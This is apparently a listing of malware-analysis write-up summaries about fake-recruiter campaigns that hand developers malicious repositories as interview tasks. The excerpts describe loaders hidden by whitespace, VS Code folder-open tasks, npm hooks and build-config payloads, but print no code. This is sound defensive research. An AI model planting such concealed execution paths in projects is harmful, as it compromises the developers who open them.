Malware-Analysis

“The rite began with promise and ended in defilement.” Executive Summary A threat actor operating a fake recruiter persona on LinkedIn targeted developers with a bogus technical assignment. The lure repository (mocorex) was hosted on Bitbucket under the fabricated organisation fortegroup-org, using a plausible corporate naming pattern rather than a verified legitimate company identity. The project presented as a standard React/Vite web application, complete with plausible component structure and a commit history spanning multiple apparent contributors. Concealed within it was a horizontally indented loader, public/vite.cookie.js, designed to evade casual code review by pushing the staging call off-screen in a normal editor viewport. In the preserved sample, the staging call appears on line 529 after 380 leading horizontal whitespace characters. ...

“The table is set like an altar, and whoso sits there is counted among the damned.” Executive Summary A threat actor operating under the GitHub organisation LimitBreakOrgs used a repository named bet_ver_1, publicly described as “BetPoker”, as a malicious Web3 gaming assessment project. The organisation name appears designed to resemble limitbreakinc, the legitimate GitHub organisation associated with Limit Break Inc., a Web3 gaming company. The preserved repository presents as a Web3 poker and sports betting platform and contains two independent execution routes: one through a VS Code folder-open task, and one through backend startup via npm start. ...

“The blueprints were genuine. The building was not.” Executive Summary A threat actor operating a fake recruiter persona on LinkedIn approached the researcher with a Technical Manager role at a fabricated DeFi company, offering $25,000 USD per month and directing the target to a Calendly booking page operated under the handle devs_empire. The actor shared a Bitbucket repository - lmng2026 - as the basis of a technical interview, presenting a polished, fully-designed DeFi platform called Lumanagi to establish credibility. The repository contained two independent execution paths: a VS Code folder-open task and a build-chain payload hidden in tailwind.config.js. The first path requires only opening the repository in a trusted VS Code workspace where automatic tasks are allowed; the second executes during normal frontend start or build activity. Neither requires the target to explicitly run the concealed payload file. ...

“He came as a messenger with gifts, and the birds grew fat.” Executive Summary A threat actor operating a fake recruiter persona on LinkedIn approached developers with a CTO-level opportunity at a fabricated Japanese e-commerce company. After establishing credibility through a polished project brief, the actor shared a GitHub repository named Japanese-Royal as part of a technical interview, directing the target to review and run the codebase. The repository contained a multi-stage implant reachable through several routine developer actions, including VS Code folder-open tasks, npm lifecycle hooks, normal startup scripts, and direct server execution. ...

“The snare is laid in secret; the prey walks toward it of his own will.” Executive Summary A threat actor, operating a fake recruiter persona on LinkedIn, targeted developers by asking them to complete a “technical assessment” that required cloning and running a malicious GitHub repository named Tech-Core. The repository contained a multi-stage malware implant designed to execute through two paths: VS Code workspace task abuse and npm script execution. ...